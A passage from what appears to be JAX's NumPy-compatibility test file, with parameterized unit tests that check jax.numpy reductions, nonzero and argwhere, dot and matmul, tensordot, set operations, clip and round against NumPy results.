for initial in [0, 1] for keepdims in [False, True])
for rec in JAX_REDUCER_INITIAL_RECORDS))
def testReducerInitial(self, np_op, jnp_op, rng_factory, shape, dtype, axis,
keepdims, initial, inexact):
rng = rng_factory(self.rng())
is_bf16_nan_test = dtype == jnp.bfloat16 and rng_factory.__name__ == 'rand_some_nan'
@jtu.ignore_warning(category=RuntimeWarning,
message="Degrees of freedom <= 0 for slice.*")
def np_fun(x):
x_cast = x if not is_bf16_nan_test else x.astype(np.float32)
res = np_op(x_cast, axis, keepdims=keepdims, initial=initial)
res = res if not is_bf16_nan_test else res.astype(jnp.bfloat16)
return res
np_fun = _promote_like_jnp(np_fun, inexact)
np_fun = jtu.ignore_warning(category=np.ComplexWarning)(np_fun)
jnp_fun = lambda x: jnp_op(x, axis, keepdims=keepdims, initial=initial)
jnp_fun = jtu.ignore_warning(category=jnp.ComplexWarning)(jnp_fun)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(itertools.chain.from_iterable(
jtu.cases_from_list(
{"testcase_name": "{}_inshape={}_axis={}_keepdims={}_initial={}_whereshape={}".format(
rec.test_name.capitalize(),
jtu.format_shape_dtype_string(shape, dtype), axis, keepdims, initial,
jtu.format_shape_dtype_string(whereshape, bool)),
"rng_factory": rec.rng_factory, "shape": shape, "dtype": dtype,
"np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name), "whereshape": whereshape,
"initial": initial, "axis": axis, "keepdims": keepdims, "inexact": rec.inexact}
for shape in rec.shapes for dtype in rec.dtypes
for whereshape in _compatible_shapes(shape)
for axis in list(range(-len(shape), len(shape))) + [None]
for initial in [0, 1] for keepdims in [False, True])
for rec in JAX_REDUCER_INITIAL_RECORDS))
def testReducerWhere(self, np_op, jnp_op, rng_factory, shape, dtype, axis,
keepdims, initial, inexact, whereshape):
if (shape in [()] + scalar_shapes and
dtype in [jnp.int16, jnp.uint16] and
jnp_op in [jnp.min, jnp.max]):
self.skipTest("Known XLA failure; see https://github.com/google/jax/issues/4971.")
rng = rng_factory(self.rng())
is_bf16_nan_test = dtype == jnp.bfloat16 and rng_factory.__name__ == 'rand_some_nan'
# Do not pass where via args_maker as that is incompatible with _promote_like_jnp.
where = jtu.rand_bool(self.rng())(whereshape, np.bool_)
@jtu.ignore_warning(category=RuntimeWarning,
message="Degrees of freedom <= 0 for slice.*")
def np_fun(x):
x_cast = x if not is_bf16_nan_test else x.astype(np.float32)
res = np_op(x_cast, axis, keepdims=keepdims, initial=initial, where=where)
res = res if not is_bf16_nan_test else res.astype(jnp.bfloat16)
return res
np_fun = _promote_like_jnp(np_fun, inexact)
np_fun = jtu.ignore_warning(category=np.ComplexWarning)(np_fun)
jnp_fun = lambda x: jnp_op(x, axis, keepdims=keepdims, initial=initial, where=where)
jnp_fun = jtu.ignore_warning(category=jnp.ComplexWarning)(jnp_fun)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@unittest.skipIf(numpy_version < (1, 20), "where parameter not supported in older numpy")
@parameterized.named_parameters(itertools.chain.from_iterable(
jtu.cases_from_list(
{"testcase_name": "{}_inshape={}_axis={}_keepdims={}_whereshape={}".format(
rec.test_name.capitalize(),
jtu.format_shape_dtype_string(shape, dtype), axis, keepdims,
jtu.format_shape_dtype_string(whereshape, bool)),
"rng_factory": rec.rng_factory, "shape": shape, "dtype": dtype,
"np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name), "whereshape": whereshape,
"axis": axis, "keepdims": keepdims, "inexact": rec.inexact}
for shape in rec.shapes for dtype in rec.dtypes
for whereshape in _compatible_shapes(shape)
for axis in list(range(-len(shape), len(shape))) + [None]
for keepdims in [False, True])
for rec in JAX_REDUCER_WHERE_NO_INITIAL_RECORDS))
def testReducerWhereNoInitial(self, np_op, jnp_op, rng_factory, shape, dtype, axis,
keepdims, inexact, whereshape):
rng = rng_factory(self.rng())
is_bf16_nan_test = dtype == jnp.bfloat16
# Do not pass where via args_maker as that is incompatible with _promote_like_jnp.
where = jtu.rand_bool(self.rng())(whereshape, np.bool_)
@jtu.ignore_warning(category=RuntimeWarning,
message="Degrees of freedom <= 0 for slice.*")
@jtu.ignore_warning(category=RuntimeWarning,
message="Mean of empty slice.*")
@jtu.ignore_warning(category=RuntimeWarning,
message="invalid value encountered in true_divide*")
def np_fun(x):
x_cast = x if not is_bf16_nan_test else x.astype(np.float32)
res = np_op(x_cast, axis, keepdims=keepdims, where=where)
res = res if not is_bf16_nan_test else res.astype(jnp.bfloat16)
return res
np_fun = _promote_like_jnp(np_fun, inexact)
np_fun = jtu.ignore_warning(category=np.ComplexWarning)(np_fun)
jnp_fun = lambda x: jnp_op(x, axis, keepdims=keepdims, where=where)
jnp_fun = jtu.ignore_warning(category=jnp.ComplexWarning)(jnp_fun)
args_maker = lambda: [rng(shape, dtype)]
if numpy_version >= (1, 20, 2) or np_op.__name__ in ("all", "any"):
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_axis={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis),
"shape": shape, "dtype": dtype, "axis": axis}
for shape in all_shapes for dtype in all_dtypes
for axis in list(range(-len(shape), len(shape))) + [None]))
def testCountNonzero(self, shape, dtype, axis):
rng = jtu.rand_some_zero(self.rng())
np_fun = lambda x: np.count_nonzero(x, axis)
jnp_fun = lambda x: jnp.count_nonzero(x, axis)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}".format(
jtu.format_shape_dtype_string(shape, dtype)),
"shape": shape, "dtype": dtype}
for shape in all_shapes for dtype in all_dtypes))
def testNonzero(self, shape, dtype):
rng = jtu.rand_some_zero(self.rng())
np_fun = lambda x: np.nonzero(x)
np_fun = jtu.ignore_warning(
category=DeprecationWarning,
message="Calling nonzero on 0d arrays.*")(np_fun)
jnp_fun = lambda x: jnp.nonzero(x)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_size={}_fill_value={}".format(
jtu.format_shape_dtype_string(shape, dtype), size, fill_value),
"shape": shape, "dtype": dtype, "size": size, "fill_value": fill_value}
for shape in nonempty_array_shapes
for dtype in all_dtypes
for fill_value in [None, -1]
for size in [1, 5, 10]))
def testNonzeroSize(self, shape, dtype, size, fill_value):
rng = jtu.rand_some_zero(self.rng())
args_maker = lambda: [rng(shape, dtype)]
@jtu.ignore_warning(category=DeprecationWarning, message="Calling nonzero on 0d arrays.*")
def np_fun(x):
result = np.nonzero(x)
if size <= len(result[0]):
return tuple(arg[:size] for arg in result)
else:
return tuple(np.concatenate([arg, np.full(size - len(arg), fill_value or 0, arg.dtype)])
for arg in result)
jnp_fun = lambda x: jnp.nonzero(x, size=size, fill_value=fill_value)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}".format(
jtu.format_shape_dtype_string(shape, dtype)),
"shape": shape, "dtype": dtype}
for shape in all_shapes for dtype in all_dtypes))
def testFlatNonzero(self, shape, dtype):
rng = jtu.rand_some_zero(self.rng())
np_fun = jtu.ignore_warning(
category=DeprecationWarning,
message="Calling nonzero on 0d arrays.*")(np.flatnonzero)
jnp_fun = jnp.flatnonzero
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
# JIT compilation requires specifying the size statically:
jnp_fun = lambda x: jnp.flatnonzero(x, size=np.size(x) // 2)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}".format(
jtu.format_shape_dtype_string(shape, dtype)),
"shape": shape, "dtype": dtype}
for shape in all_shapes for dtype in all_dtypes))
def testArgWhere(self, shape, dtype):
rng = jtu.rand_some_zero(self.rng())
np_fun = jtu.ignore_warning(
category=DeprecationWarning,
message="Calling nonzero on 0d arrays.*")(np.argwhere)
jnp_fun = jnp.argwhere
args_maker = lambda: [rng(shape, dtype)]
if shape in (scalar_shapes + [()]) and numpy_version < (1, 18):
self.skipTest("np.argwhere() result for scalar input changed in numpy 1.18.")
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
# JIT compilation requires specifying a size statically. Full test of this
# behavior is in testNonzeroSize().
jnp_fun = lambda x: jnp.argwhere(x, size=np.size(x) // 2)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "{}_inshape={}_axis={}".format(
rec.test_name.capitalize(),
jtu.format_shape_dtype_string(shape, dtype), axis),
"rng_factory": rec.rng_factory, "shape": shape, "dtype": dtype,
"np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name),
"axis": axis}
for rec in JAX_ARGMINMAX_RECORDS
for shape, dtype in _shape_and_dtypes(rec.shapes, rec.dtypes)
for axis in range(-len(shape), len(shape))))
def testArgMinMax(self, np_op, jnp_op, rng_factory, shape, dtype, axis):
rng = rng_factory(self.rng())
if dtype == np.complex128 and jtu.device_under_test() == "gpu":
raise unittest.SkipTest("complex128 reductions not supported on GPU")
if "nan" in np_op.__name__ and dtype == jnp.bfloat16:
raise unittest.SkipTest("NumPy doesn't correctly handle bfloat16 arrays")
def np_fun(array_to_reduce):
return np_op(array_to_reduce, axis).astype(jnp.int_)
def jnp_fun(array_to_reduce):
return jnp_op(array_to_reduce, axis)
args_maker = lambda: [rng(shape, dtype)]
try:
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
except ValueError as e:
if str(e) == "All-NaN slice encountered":
self.skipTest("JAX doesn't support checking for all-NaN slices")
else:
raise
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": rec.test_name.capitalize(), "name": rec.name,
"np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name)}
for rec in JAX_ARGMINMAX_RECORDS))
def testArgMinMaxEmpty(self, name, np_op, jnp_op):
name = name[3:] if name.startswith("nan") else name
msg = "attempt to get {} of an empty sequence".format(name)
with self.assertRaises(ValueError, msg=msg):
jnp_op(np.array([]))
with self.assertRaises(ValueError, msg=msg):
jnp_op(np.zeros((2, 0)), axis=1)
np_fun = partial(np_op, axis=0)
jnp_fun = partial(jnp_op, axis=0)
args_maker = lambda: [np.zeros((2, 0))]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}_{}".format(
jtu.format_shape_dtype_string(lhs_shape, lhs_dtype),
jtu.format_shape_dtype_string(rhs_shape, rhs_dtype),
axes),
"lhs_shape": lhs_shape, "lhs_dtype": lhs_dtype,
"rhs_shape": rhs_shape, "rhs_dtype": rhs_dtype,
"axes": axes}
for lhs_shape, rhs_shape, axes in [
[(2,), (2,), (-1, -1, -1, None)], # scalar output
[(2, 4), (2, 4), (-1, -1, -1, 0)], # 2D vectors
[(3, 4), (3, 4), (-1, -1, -1, 0)], # 3D vectors
[(3, 4), (3, 6, 5, 4), (-1, -1, -1, 0)], # broadcasting
[(4, 3), (3, 6, 5, 4), (1, 0, -1, None)], # different axes
[(6, 1, 3), (5, 3), (-1, -1, -1, None)], # more broadcasting
[(6, 1, 2), (5, 3), (-1, -1, -1, None)], # mixed 2D and 3D vectors
[(10, 5, 2, 8), (1, 5, 1, 3), (-2, -1, -3, None)], # axes/broadcasting
[(4, 5, 2), (4, 5, 2), (-1, -1, 0, None)], # axisc should do nothing
[(4, 5, 2), (4, 5, 2), (-1, -1, -1, None)] # same as before
]
for lhs_dtype, rhs_dtype in itertools.combinations_with_replacement(number_dtypes, 2)))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testCross(self, lhs_shape, lhs_dtype, rhs_shape, rhs_dtype, axes):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(lhs_shape, lhs_dtype), rng(rhs_shape, rhs_dtype)]
axisa, axisb, axisc, axis = axes
jnp_fun = lambda a, b: jnp.cross(a, b, axisa, axisb, axisc, axis)
def np_fun(a, b):
a = a.astype(np.float32) if lhs_dtype == jnp.bfloat16 else a
b = b.astype(np.float32) if rhs_dtype == jnp.bfloat16 else b
out = np.cross(a, b, axisa, axisb, axisc, axis)
return out.astype(jnp.promote_types(lhs_dtype, rhs_dtype))
tol_spec = {dtypes.bfloat16: 3e-1, np.float16: 0.15}
tol = max(jtu.tolerance(lhs_dtype, tol_spec),
jtu.tolerance(rhs_dtype, tol_spec))
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker, atol=tol,
rtol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}_{}".format(
name,
jtu.format_shape_dtype_string(lhs_shape, lhs_dtype),
jtu.format_shape_dtype_string(rhs_shape, rhs_dtype)),
"lhs_shape": lhs_shape, "lhs_dtype": lhs_dtype,
"rhs_shape": rhs_shape, "rhs_dtype": rhs_dtype}
for name, lhs_shape, rhs_shape in [
("matrix-scalar", (3, 3), ()),
("scalar-matrix", (), (3, 3)),
("matrix-vector", (4, 5), (5,)),
("vector-matrix", (6,), (6, 4)),
("matrix-matrix", (3, 4), (4, 5)),
("tensor-vector", (4, 3, 2), (2,)),
("vector-tensor", (2,), (3, 2, 4)),
("tensor-matrix", (4, 3, 2), (2, 5)),
("matrix-tensor", (5, 2), (3, 2, 4)),
("tensor-tensor", (2, 3, 4), (5, 4, 1))]
for lhs_dtype, rhs_dtype in itertools.combinations_with_replacement(number_dtypes, 2)))
def testDot(self, lhs_shape, lhs_dtype, rhs_shape, rhs_dtype):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(lhs_shape, lhs_dtype), rng(rhs_shape, rhs_dtype)]
tol = {np.float16: 1e-2, np.float32: 1e-5, np.float64: 1e-14,
np.complex128: 1e-14}
if jtu.device_under_test() == "tpu":
tol[np.float16] = tol[np.float32] = tol[np.complex64] = 2e-1
def np_dot(x, y):
x = x.astype(np.float32) if lhs_dtype == jnp.bfloat16 else x
y = y.astype(np.float32) if rhs_dtype == jnp.bfloat16 else y
return np.dot(x, y).astype(jnp.promote_types(lhs_dtype, rhs_dtype))
self._CheckAgainstNumpy(np_dot, jnp.dot, args_maker,
tol=tol)
self._CompileAndCheck(jnp.dot, args_maker, atol=tol,
rtol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}_{}".format(
name,
jtu.format_shape_dtype_string(lhs_shape, lhs_dtype),
jtu.format_shape_dtype_string(rhs_shape, rhs_dtype)),
"lhs_shape": lhs_shape, "lhs_dtype": lhs_dtype,
"rhs_shape": rhs_shape, "rhs_dtype": rhs_dtype}
for name, lhs_shape, rhs_shape in [
("vector-vector", (3,), (3,)),
("matrix-vector", (3, 3), (3,)),
("vector-matrix", (3,), (3, 3)),
("matrix-matrix", (3, 3), (3, 3)),
("vector-tensor", (3,), (5, 3, 2)),
("tensor-vector", (5, 3, 2), (2,)),
("matrix-tensor", (5, 2), (3, 2, 4)),
("tensor-matrix", (5, 2, 3), (3, 2)),
("tensor-tensor", (5, 3, 4), (5, 4, 1)),
("tensor-tensor-broadcast", (3, 1, 3, 4), (5, 4, 1))]
for lhs_dtype, rhs_dtype in itertools.combinations_with_replacement(number_dtypes, 2)))
def testMatmul(self, lhs_shape, lhs_dtype, rhs_shape, rhs_dtype):
rng = jtu.rand_default(self.rng())
def np_fun(x, y):
dtype = jnp.promote_types(lhs_dtype, rhs_dtype)
return np.matmul(x, y).astype(dtype)
args_maker = lambda: [rng(lhs_shape, lhs_dtype), rng(rhs_shape, rhs_dtype)]
tol = {np.float16: 1e-2, np.float32: 2e-2, np.float64: 1e-12,
np.complex128: 1e-12}
if jtu.device_under_test() == "tpu":
tol[np.float16] = tol[np.float32] = tol[np.complex64] = 4e-2
self._CheckAgainstNumpy(np_fun, jnp.matmul, args_maker, tol=tol)
self._CompileAndCheck(jnp.matmul, args_maker, atol=tol, rtol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}_{}".format(
jtu.format_shape_dtype_string(lhs_shape, lhs_dtype),
jtu.format_shape_dtype_string(rhs_shape, rhs_dtype),
axes),
"lhs_shape": lhs_shape, "lhs_dtype": lhs_dtype,
"rhs_shape": rhs_shape, "rhs_dtype": rhs_dtype,
"axes": axes}
for lhs_shape, rhs_shape, axes in [
[(3,), (), 0],
[(2, 3, 4), (5, 6, 7), 0], # from issue #740
[(2, 3, 4), (3, 4, 5, 6), 2],
[(2, 3, 4), (5, 4, 3, 6), [1, 2]],
[(2, 3, 4), (5, 4, 3, 6), [[1, 2], [2, 1]]],
[(1, 2, 3, 4), (4, 5, 3, 6), [[2, 3], [2, 0]]],
]
for lhs_dtype, rhs_dtype in itertools.combinations_with_replacement(number_dtypes, 2)))
def testTensordot(self, lhs_shape, lhs_dtype, rhs_shape, rhs_dtype, axes):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(lhs_shape, lhs_dtype), rng(rhs_shape, rhs_dtype)]
jnp_fun = lambda a, b: jnp.tensordot(a, b, axes)
def np_fun(a, b):
a = a if lhs_dtype != jnp.bfloat16 else a.astype(np.float32)
b = b if rhs_dtype != jnp.bfloat16 else b.astype(np.float32)
dtype = jnp.promote_types(lhs_dtype, rhs_dtype)
return np.tensordot(a, b, axes).astype(dtype)
tol = {np.float16: 1e-1, np.float32: 1e-3, np.float64: 1e-12,
np.complex64: 1e-3, np.complex128: 1e-12}
if jtu.device_under_test() == "tpu":
tol[np.float16] = tol[np.float32] = tol[np.complex64] = 2e-1
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker)
def testTensordotErrors(self):
a = np.random.random((3, 2, 2))
b = np.random.random((2,))
self.assertRaisesRegex(
TypeError, "Number of tensordot axes.*exceeds input ranks.*",
lambda: jnp.tensordot(a, b, axes=2))
self.assertRaisesRegex(
TypeError, "tensordot requires axes lists to have equal length.*",
lambda: jnp.tensordot(a, b, axes=([0], [0, 1])))
self.assertRaisesRegex(
TypeError, "tensordot requires both axes lists to be either ints, tuples or lists.*",
lambda: jnp.tensordot(a, b, axes=('bad', 'axes')))
self.assertRaisesRegex(
TypeError, "tensordot axes argument must be an int, a pair of ints, or a pair of lists.*",
lambda: jnp.tensordot(a, b, axes='badaxes'))
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}_invert={}".format(
jtu.format_shape_dtype_string(element_shape, dtype),
jtu.format_shape_dtype_string(test_shape, dtype), invert),
"element_shape": element_shape, "test_shape": test_shape,
"dtype": dtype, "invert": invert}
for element_shape in all_shapes
for test_shape in all_shapes
for dtype in default_dtypes
for invert in [True, False]))
def testIsin(self, element_shape, test_shape, dtype, invert):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(element_shape, dtype), rng(test_shape, dtype)]
jnp_fun = lambda e, t: jnp.isin(e, t, invert=invert)
np_fun = lambda e, t: np.isin(e, t, invert=invert)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}_invert={}".format(
jtu.format_shape_dtype_string(element_shape, dtype),
jtu.format_shape_dtype_string(test_shape, dtype), invert),
"element_shape": element_shape, "test_shape": test_shape,
"dtype": dtype, "invert": invert}
for element_shape in all_shapes
for test_shape in all_shapes
for dtype in default_dtypes
for invert in [True, False]))
def testIn1d(self, element_shape, test_shape, dtype, invert):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(element_shape, dtype), rng(test_shape, dtype)]
jnp_fun = lambda e, t: jnp.in1d(e, t, invert=invert)
np_fun = lambda e, t: np.in1d(e, t, invert=invert)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}".format(
jtu.format_shape_dtype_string(shape1, dtype1),
jtu.format_shape_dtype_string(shape2, dtype2)),
"shape1": shape1, "shape2": shape2, "dtype1": dtype1, "dtype2": dtype2}
for dtype1 in [s for s in default_dtypes if s != jnp.bfloat16]
for dtype2 in [s for s in default_dtypes if s != jnp.bfloat16]
for shape1 in all_shapes
for shape2 in all_shapes))
def testSetdiff1d(self, shape1, shape2, dtype1, dtype2):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape1, dtype1), rng(shape2, dtype2)]
self._CheckAgainstNumpy(np.setdiff1d, jnp.setdiff1d, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}".format(
jtu.format_shape_dtype_string(shape1, dtype1),
jtu.format_shape_dtype_string(shape2, dtype2)),
"shape1": shape1, "shape2": shape2, "dtype1": dtype1, "dtype2": dtype2}
for dtype1 in [s for s in default_dtypes if s != jnp.bfloat16]
for dtype2 in [s for s in default_dtypes if s != jnp.bfloat16]
for shape1 in nonempty_nonscalar_array_shapes
for shape2 in nonempty_nonscalar_array_shapes))
def testUnion1d(self, shape1, shape2, dtype1, dtype2):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape1, dtype1), rng(shape2, dtype2)]
def np_fun(arg1, arg2):
dtype = jnp.promote_types(arg1.dtype, arg2.dtype)
return np.union1d(arg1, arg2).astype(dtype)
self._CheckAgainstNumpy(np_fun, jnp.union1d, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}_size={}".format(
jtu.format_shape_dtype_string(shape1, dtype1),
jtu.format_shape_dtype_string(shape2, dtype2), size),
"shape1": shape1, "shape2": shape2, "dtype1": dtype1, "dtype2": dtype2, "size": size}
for dtype1 in [s for s in default_dtypes if s != jnp.bfloat16]
for dtype2 in [s for s in default_dtypes if s != jnp.bfloat16]
for shape1 in nonempty_nonscalar_array_shapes
for shape2 in nonempty_nonscalar_array_shapes
for size in [1, 5, 10]))
def testUnion1dSize(self, shape1, shape2, dtype1, dtype2, size):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape1, dtype1), rng(shape2, dtype2)]
def np_fun(arg1, arg2):
dtype = jnp.promote_types(arg1.dtype, arg2.dtype)
result = np.union1d(arg1, arg2).astype(dtype)
if size <= len(result):
return result[:size]
else:
return np.concatenate([result, np.full(size - len(result), result[0], result.dtype)])
def jnp_fun(arg1, arg2):
return jnp.union1d(arg1, arg2, size=size)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}_assume_unique={}".format(
jtu.format_shape_dtype_string(shape1, dtype1),
jtu.format_shape_dtype_string(shape2, dtype2),
assume_unique),
"shape1": shape1, "dtype1": dtype1, "shape2": shape2, "dtype2": dtype2,
"assume_unique": assume_unique}
for dtype1 in [s for s in default_dtypes if s != jnp.bfloat16]
for dtype2 in [s for s in default_dtypes if s != jnp.bfloat16]
for shape1 in all_shapes
for shape2 in all_shapes
for assume_unique in [False, True]))
def testSetxor1d(self, shape1, dtype1, shape2, dtype2, assume_unique):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape1, dtype1), rng(shape2, dtype2)]
jnp_fun = lambda ar1, ar2: jnp.setxor1d(ar1, ar2, assume_unique=assume_unique)
def np_fun(ar1, ar2):
if assume_unique:
# pre-flatten the arrays to match with jax implementation
ar1 = np.ravel(ar1)
ar2 = np.ravel(ar2)
return np.setxor1d(ar1, ar2, assume_unique)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}_assume_unique={}_return_indices={}".format(
jtu.format_shape_dtype_string(shape1, dtype1),
jtu.format_shape_dtype_string(shape2, dtype2),
assume_unique,
return_indices),
"shape1": shape1, "dtype1": dtype1, "shape2": shape2, "dtype2": dtype2,
"assume_unique": assume_unique, "return_indices": return_indices}
for dtype1 in [s for s in default_dtypes if s != jnp.bfloat16]
for dtype2 in [s for s in default_dtypes if s != jnp.bfloat16]
for shape1 in all_shapes
for shape2 in all_shapes
for assume_unique in [False, True]
for return_indices in [False, True]))
def testIntersect1d(self, shape1, dtype1, shape2, dtype2, assume_unique, return_indices):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape1, dtype1), rng(shape2, dtype2)]
jnp_fun = lambda ar1, ar2: jnp.intersect1d(ar1, ar2, assume_unique=assume_unique, return_indices=return_indices)
np_fun = lambda ar1, ar2: np.intersect1d(ar1, ar2, assume_unique=assume_unique, return_indices=return_indices)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}".format(
jtu.format_shape_dtype_string(lhs_shape, lhs_dtype),
jtu.format_shape_dtype_string(rhs_shape, rhs_dtype)),
"lhs_shape": lhs_shape, "lhs_dtype": lhs_dtype,
"rhs_shape": rhs_shape, "rhs_dtype": rhs_dtype}
# TODO(phawkins): support integer dtypes too.
for lhs_shape, lhs_dtype in _shape_and_dtypes(all_shapes, inexact_dtypes)
for rhs_shape, rhs_dtype in _shape_and_dtypes(all_shapes, inexact_dtypes)
if len(jtu._dims_of_shape(lhs_shape)) == 0
or len(jtu._dims_of_shape(rhs_shape)) == 0
or lhs_shape[-1] == rhs_shape[-1]))
def testInner(self, lhs_shape, lhs_dtype, rhs_shape, rhs_dtype):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(lhs_shape, lhs_dtype), rng(rhs_shape, rhs_dtype)]
def np_fun(lhs, rhs):
lhs = lhs if lhs_dtype != jnp.bfloat16 else lhs.astype(np.float32)
rhs = rhs if rhs_dtype != jnp.bfloat16 else rhs.astype(np.float32)
dtype = jnp.promote_types(lhs_dtype, rhs_dtype)
return np.inner(lhs, rhs).astype(dtype)
jnp_fun = lambda lhs, rhs: jnp.inner(lhs, rhs)
tol_spec = {np.float16: 1e-2, np.float32: 1e-5, np.float64: 1e-13,
np.complex64: 1e-5}
if jtu.device_under_test() == "tpu":
tol_spec[np.float32] = tol_spec[np.complex64] = 2e-1
tol = max(jtu.tolerance(lhs_dtype, tol_spec),
jtu.tolerance(rhs_dtype, tol_spec))
# TODO(phawkins): there are float32/float64 disagreements for some inputs.
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=False, atol=tol,
rtol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_amin={}_amax={}".format(
jtu.format_shape_dtype_string(shape, dtype), a_min, a_max),
"shape": shape, "dtype": dtype, "a_min": a_min, "a_max": a_max}
for shape in all_shapes for dtype in number_dtypes
for a_min, a_max in [(-1, None), (None, 1), (-0.9, 1),
(-np.ones(1), None),
(None, np.ones(1)),
(np.full(1, -0.9), np.ones(1))]))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testClipStaticBounds(self, shape, dtype, a_min, a_max):
rng = jtu.rand_default(self.rng())
np_fun = lambda x: np.clip(x, a_min=a_min, a_max=a_max)
jnp_fun = lambda x: jnp.clip(x, a_min=a_min, a_max=a_max)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
self._CompileAndCheck(jnp_fun, args_maker)
def testClipError(self):
with self.assertRaisesRegex(ValueError, "At most one of a_min and a_max.*"):
jnp.clip(jnp.zeros((3,)))
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_decimals={}".format(
jtu.format_shape_dtype_string(shape, dtype), decimals),
"shape": shape, "dtype": dtype, "decimals": decimals}
for shape, dtype in _shape_and_dtypes(all_shapes, number_dtypes)
for decimals in [0, 1, -2]))
def testRoundStaticDecimals(self, shape, dtype, decimals):
rng = jtu.rand_default(self.rng())
if jnp.issubdtype(dtype, np.integer) and decimals < 0:
self.skipTest("Integer rounding with decimals < 0 not implemented")
np_fun = lambda x: np.round(x, decimals=decimals)
jnp_fun = lambda x: jnp.round(x, decimals=decimals)
args_maker = lambda: [rng(shape, dtype)]
tol = {jnp.bfloat16: 5e-2, np.float16: 1e-2}
check_dtypes = shape is not jtu.PYTHON_SCALAR_SHAPE
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
check_dtypes=check_dtypes, tol=tol)
self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=check_dtypes,
atol=tol, rtol=tol)
def testOperatorRound(self):
self.assertAllClose(round(np.float32(7.532), 1),
round(jnp.float32(7.5), 1))
self.assertAllClose(round(np.float32(1.234), 2),
round(jnp.float32(1.234), 2))
self.assertAllClose(round(np.float32(1.234)),
round(jnp.float32(1.234)), check_dtypes=False)
self.assertAllClose(round(np.float32(7.532), 1),
round(jnp.array(7.5, jnp.float32), 1))
